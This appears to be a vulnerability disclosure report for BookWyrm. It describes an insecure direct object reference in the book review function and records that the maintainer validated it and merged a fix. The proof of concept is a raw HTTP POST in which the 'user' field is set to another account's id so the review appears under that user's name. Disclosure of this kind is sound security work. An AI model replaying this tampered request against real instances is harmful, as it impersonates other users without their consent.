Insecure direct object references in "review" function in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 15th 2022


Description

Insecure direct object references in review a book function allows one user to create a comment on behalf of another.

Proof of Concept

POST /post/review HTTP/2
Host: book.dansmonorage.blue
Cookie: csrftoken=bYsdqkQkkbYXZYRVd8AynhYxG1rBb2AoOfAO76XCYmgzXK3A266EpZamGcKL0pN5; django_language=None; sessionid=yq7gxnp9ypxohws3mmh1h7mrgogg6xsz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://book.dansmonorage.blue/
Content-Type: multipart/form-data; boundary=---------------------------269697065920795935563955484832
Content-Length: 1207
Origin: https://book.dansmonorage.blue
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: green
Te: trailers

-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="csrfmiddlewaretoken"

EEplsmJEq47ABzhShOKjf4PAbhjHG2YohVxW98QW4fpczltx6MgphM1pbsCRvpb5
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="book"

60596
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="user"

6847 // change others id
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="reply_parent"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="name"

From id 6847
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="rating"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content"

My book1 <h1>123</h1>
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content_warning"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="privacy"

public
-----------------------------269697065920795935563955484832--

Impact

This vulnerability is capable of allows a user to review a book on other users' accounts, affecting the logic of the application.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 19 days ago
Mouse Reeve validated this vulnerability 19 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on b66ce2 19 days ago
The fix bounty has been dropped
Mouse Reeve gave praise 19 days ago
Thanks for catching these!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation